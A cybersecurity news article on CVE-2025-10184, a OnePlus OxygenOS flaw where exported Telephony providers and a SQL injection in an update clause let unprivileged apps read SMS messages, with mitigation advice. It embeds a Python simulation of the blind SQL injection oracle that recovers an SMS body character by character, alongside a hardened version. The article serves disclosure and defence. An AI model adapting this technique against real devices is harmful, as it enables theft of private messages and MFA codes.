Categories: Cyber Security News

OnePlus OxygenOS Flaw Lets Any App Steal SMS Data Without Permission

A critical permission bypass in OnePlus’s OxygenOS enables any installed application to silently access and exfiltrate users’ SMS and MMS messages, undermining the security of SMS-based multi-factor authentication (MFA) and threatening sensitive data confidentiality.

Rapid7 researchers found that a content provider in the core Telephony provider package of several OxygenOS 12, 14 and 15 builds accepts update operations from any app without enforcing a write permission, and that a SQL injection in that update path lets unprivileged apps read and manipulate telephony data without user consent.


OnePlus has acknowledged the issue and is investigating a fix.

Widespread Devices and Builds Impacted

Rapid7 confirmed the vulnerability, tracked as CVE-2025-10184, on OnePlus 8T (KB2003, OxygenOS 12), and several OnePlus 10 Pro 5G builds running OxygenOS 14 and 15.

The OxygenOS 11 builds Rapid7 tested were not vulnerable. Because the flaw first appears in OxygenOS 12, any OnePlus device upgraded to OxygenOS 12 or later should be assumed to be at risk.

Because the flaw sits in the Telephony provider package (com.android.providers.telephony) that OnePlus ships with these software versions, rather than in device-specific hardware code, it likely extends to every device running those versions, exposing SMS metadata and message bodies to extraction by unauthorized apps.

Rapid7 was unable to coordinate disclosure with OnePlus before publication due to restrictive bug bounty NDA terms, but OnePlus reached out on September 24, 2025, to confirm they are investigating Rapid7’s findings.

Technical Root Cause and Exploitation

Android content providers mediate access to structured data such as SMS messages via content:// URIs. Access is gated by the permissions declared on the owning app's <provider> element in AndroidManifest.xml (android:permission, or separate android:readPermission and android:writePermission attributes); a provider that is exported without a write permission can be updated by any app on the device.

On affected OxygenOS builds, three additional Telephony providers (PushMessageProvider, PushShopProvider and ServiceNumberProvider) are exported without enforcing a write permission.

ServiceNumberProvider's update method passes the caller-supplied "where" clause unsanitized into SQLiteDatabase.update(), so the clause can carry arbitrary SQL, including subqueries against other tables in the same database.

Because update() returns the number of rows affected, and a crafted clause can also be made to trigger unique constraint errors, the attacker obtains a yes/no oracle: a condition that holds matches a row, one that does not matches none. That is enough for blind SQL injection, inferring database contents (including SMS bodies) one character at a time.


Rapid7 demonstrated how a proof-of-concept app, requiring no permissions, can retrieve recent SMS bodies—including MFA codes—from the user’s device.
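The oracle described above, as an added stand-alone simulation in Python/sqlite3. This is not Rapid7's proof of concept and not OnePlus code: the table layout, column names, phone number and message text are constructed for illustration, and on a real device the attacker would issue the same updates through ContentResolver.update() against the provider's content:// URI. The vulnerable class mirrors the bug (caller-supplied "where" concatenated into the UPDATE, no write permission, row count returned); the hardened class shows the two checks that close it.

```python
"""
Blind SQL injection through a content provider's update() 'where' clause,
modelled on the ServiceNumberProvider weakness. Added example, not the
original article's or vendor's code; all data below is constructed.
"""
import re
import sqlite3


def build_db():
    """Constructed sample database: one SMS carrying an MFA code, plus the
    table the vulnerable provider actually manages."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE sms (_id INTEGER PRIMARY KEY, address TEXT, body TEXT);
        CREATE TABLE service_number (_id INTEGER PRIMARY KEY, number TEXT);
        INSERT INTO sms (address, body) VALUES ('+15550001111', 'Your code is 483921');
        INSERT INTO service_number (number) VALUES ('10086');
    """)
    return conn


class VulnerableProvider:
    """Mirrors the bug class: the caller's 'where' string is concatenated into
    the UPDATE unchecked, no write permission is enforced, and the number of
    rows touched is handed straight back to the caller."""

    def __init__(self, conn):
        self.conn = conn

    def update(self, values, where, caller_has_write_permission=False):
        set_clause = ", ".join(f"{col} = ?" for col in values)
        sql = f"UPDATE service_number SET {set_clause} WHERE {where}"
        cur = self.conn.execute(sql, list(values.values()))
        self.conn.commit()
        return cur.rowcount


class HardenedProvider(VulnerableProvider):
    """Two fixes, in order of importance: enforce the write permission the
    affected providers skipped, and accept only a selection shaped like a
    simple row lookup so no subquery ever reaches the SQL engine (on Android,
    SQLiteQueryBuilder strict mode is the built-in way to do the latter)."""

    def update(self, values, where, caller_has_write_permission=False):
        if not caller_has_write_permission:
            raise PermissionError("write permission required for update()")
        if not re.fullmatch(r"_id = \d+", where):
            raise ValueError("selection rejected: not a simple _id lookup")
        return super().update(values, where, caller_has_write_permission)


def oracle(provider, condition):
    """One yes/no question: a benign update (it rewrites the value already
    stored) whose WHERE clause carries the attacker's condition. rowcount 1
    means the condition held, 0 means it did not. The unique-constraint-error
    variant mentioned in the article gives the same one-bit signal."""
    return provider.update({"number": "10086"}, f"_id = 1 AND ({condition})") == 1


def leak_char(provider, pos):
    """Binary-search the code point of character 'pos' of the newest SMS body:
    7 updates per character instead of up to 128 equality guesses."""
    expr = ("ifnull(unicode(substr((SELECT body FROM sms ORDER BY _id DESC "
            f"LIMIT 1), {pos}, 1)), 0)")
    lo, hi = 0, 127
    while lo < hi:
        mid = (lo + hi) // 2
        if oracle(provider, f"{expr} > {mid}"):
            lo = mid + 1
        else:
            hi = mid
    return lo  # 0 once we have run past the end of the string


def leak_latest_sms(provider, max_len=160):
    """Recover the newest SMS body one character at a time; returns None when
    the provider refuses the attacker's updates."""
    out = []
    try:
        for pos in range(1, max_len + 1):
            code = leak_char(provider, pos)
            if code == 0:
                break
            out.append(chr(code))
    except (PermissionError, ValueError):
        return None
    return "".join(out)


if __name__ == "__main__":
    print("vulnerable provider leaks:", leak_latest_sms(VulnerableProvider(build_db())))
    print("hardened provider leaks:  ", leak_latest_sms(HardenedProvider(build_db())))
```

The attacker never reads the sms table directly and never needs READ_SMS: every query is an update against the provider's own table, and only the WHERE clause's subquery touches sms. That is why a permission model that guards reads but leaves writes open still loses the message bodies.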

With no vendor patch currently available, OnePlus users can limit exposure by restricting app installations to trusted sources and removing unneeded third-party apps.

To safeguard account security, users are advised to migrate critical services from SMS-based MFA to authenticator apps or hardware tokens.

Employing end-to-end encrypted messaging platforms instead of SMS for sensitive communications further reduces data leakage risk.

Additionally, switching service notifications to in-app push messages where possible keeps that traffic out of the SMS store this flaw exposes. Users should monitor OnePlus security updates and install vendor patches promptly once released.

This disclosure underscores the dangers of OEM modifications to core Android framework components and highlights the importance of rigorous permission enforcement in system content providers.

As state-sponsored adversaries increasingly target surveillance opportunities, such vulnerabilities threaten individual privacy and national security alike.


The post OnePlus OxygenOS Flaw Lets Any App Steal SMS Data Without Permission appeared first on Cyber Security News.

rssfeeds-admin
